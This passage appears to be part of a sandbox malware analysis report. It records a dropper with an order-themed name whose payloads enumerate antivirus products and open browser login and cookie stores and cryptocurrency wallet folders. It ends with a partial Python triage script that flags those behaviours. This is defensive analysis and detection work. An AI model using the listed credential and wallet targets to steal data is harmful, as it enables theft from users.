Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTF78A.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTF78B.tmp VolumeInformation
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00434E87
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00441E06 GetUserNameW, 0_2_00441E06
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00433F3A
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_004049A0
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 5.2.RegSvcs.exe.3d96bf0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.3d007a0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.build.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.3d007a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.3d4b9d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.3d96bf0.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.3d4b9d0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.1272520755.0000000003CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.1258507285.00000000006B2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1272520755.0000000003D34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1272520755.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build.exe PID: 6104, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Source: Yara match File source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.2d0ea18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.2d18074.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.2d053d4.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.2d18074.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.2d053d4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.XClient.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2500110094.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1260246043.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: XClient.exe PID: 7184, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectrumE#
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: JaxxE#
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusE#
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: EthereumE#
Source: powershell.exe, 00000010.00000002.1416575661.0000021990076000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
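The two behaviour groups above (the WMI queries against ROOT\SecurityCenter and ROOT\SecurityCenter2 for AntivirusProduct, AntiSpyWareProduct and FirewallProduct, and the file opens of browser credential stores and wallet directories by build.exe) are what an analyst would turn into host-level triage rules. The following is an added example written for this page, not code from the Joe Sandbox report or from the malware: it parses the report's own "Source: <process> <action>: <detail>" line format and tags a process that enumerates security products over WMI, opens a browser credential or cookie store while not itself being a browser, or opens a known wallet directory under AppData. The browser allowlist (chrome.exe, msedge.exe, firefox.exe), the wallet directory list, and the sample lines are assumptions; the sample is constructed from paths in this report plus two benign lines to show what is not flagged.

```python
"""Triage helper for Joe Sandbox-style behaviour lines.

Added example, not part of the sandbox report or of the malware. It parses the
"Source: <process> <action>: <detail>" lines the report uses and tags the two
behaviours the report shows: enumeration of security products through the
SecurityCenter / SecurityCenter2 WMI namespaces, and access to browser
credential stores or cryptocurrency wallet directories by a non-browser process.
"""
import re
from collections import defaultdict

# One behaviour line of the report; the HTML link text "Jump to behavior" that
# the export leaves on some lines is made optional so both variants parse.
LINE_RE = re.compile(
    r"^Source:\s+(?P<proc>.+?\.exe)\s+"
    r"(?P<action>WMI Queries|File opened):\s+"
    r"(?P<detail>.+?)(?:\s+Jump to behavior)?\s*$"
)
WMI_RE = re.compile(r"ExecQuery\s*-\s*(?P<ns>\S+)\s*:\s*(?P<query>.+)$", re.IGNORECASE)

# WMI classes under ROOT\SecurityCenter(2) that reveal installed AV/firewall
# products (ATT&CK T1518.001, Security Software Discovery).
SEC_CLASSES = {"antivirusproduct", "antispywareproduct", "firewallproduct"}

# Credential and cookie stores of Chromium- and Gecko-based browsers
# (ATT&CK T1555.003, Credentials from Web Browsers).
BROWSER_STORE_RE = re.compile(
    r"\\(Login Data|Web Data|Cookies|Extension Cookies|cookies\.sqlite|logins\.json|key4\.db)$",
    re.IGNORECASE,
)
# Assumed allowlist: the browsers themselves legitimately open their own stores.
BROWSER_PROCS = {"chrome.exe", "msedge.exe", "firefox.exe"}

# Wallet directories under AppData that the report shows being opened (assumed list).
WALLET_DIRS = {"electrum", "exodus", "ethereum", "atomic", "binance",
               "coinomi", "guarda", "com.liberty.jaxx"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(line):
    """Return (process_path, tag) for a suspicious line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    proc, action, detail = m.group("proc"), m.group("action"), m.group("detail")

    if action == "WMI Queries":
        w = WMI_RE.search(detail)
        if not w:
            return None
        namespace = w.group("ns").lower()
        cls = re.search(r"\bfrom\s+(\w+)", w.group("query").lower())
        if "securitycenter" in namespace and cls and cls.group(1) in SEC_CLASSES:
            return (proc, "security_software_discovery")
        return None

    # action == "File opened": strip the trailing backslash of directory opens
    path = detail.rstrip("\\")
    if BROWSER_STORE_RE.search(path) and basename(proc) not in BROWSER_PROCS:
        return (proc, "browser_credential_access")
    parts = [p.lower() for p in path.split("\\")]
    if "appdata" in parts and any(p in WALLET_DIRS for p in parts):
        return (proc, "crypto_wallet_access")
    return None


def triage(lines):
    """Map each process (file name) to the sorted list of tags it triggered."""
    found = defaultdict(set)
    for line in lines:
        hit = classify(line)
        if hit:
            proc, tag = hit
            found[basename(proc)].add(tag)
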